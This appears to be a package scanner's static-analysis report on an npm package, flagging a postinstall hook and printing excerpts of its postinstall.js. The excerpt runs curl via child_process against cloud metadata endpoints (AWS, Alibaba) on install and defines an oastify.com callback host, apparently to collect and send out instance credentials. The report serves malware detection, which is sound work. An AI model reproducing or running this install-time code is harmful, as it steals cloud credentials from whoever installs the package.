Static Scan Results
scanned 2h ago · by rust-scannerStatic analysis flagged 6 finding(s) at 72.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.
Static reason
One or more suspicious static signals were detected.
Decision evidence
public snapshotBehavioral surface
ChildProcess
TrivialUrlStrings
Source & flagged code
3 flagged · loading sourcepackage.jsonView file
•scripts.postinstall = node postinstall.js
High
Install Time Lifecycle Scripts
Package defines install-time lifecycle scripts.
package.jsonView on unpkg•scripts.postinstall = node postinstall.js
Medium
Ambiguous Install Lifecycle Script
Install-time lifecycle script is not statically allowlisted and needs review.
package.jsonView on unpkgpostinstall.jsView file
1const { exec } = require('child_process');
L2: const BURP = '[redacted].oastify.com';
L3: const cmd = `curl -s -m 3 http://100.100.100.200/latest/meta-data/ -o /tmp/ali.txt ; curl -s -m 3 http://169.254.169.254/latest/meta-data/ -o /tmp/aws.txt ; curl -s -m 3 http://met...
L4: exec(cmd, () => {});
High
Cloud Metadata Access
Source reaches cloud instance metadata or link-local credential endpoints.
postinstall.jsView on unpkg · L1Findings
2 High2 Medium2 Low
HighInstall Time Lifecycle Scriptspackage.json
HighCloud Metadata Accesspostinstall.js
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumStructural Risk Force Deep Review
LowScripts Present
LowUrl Strings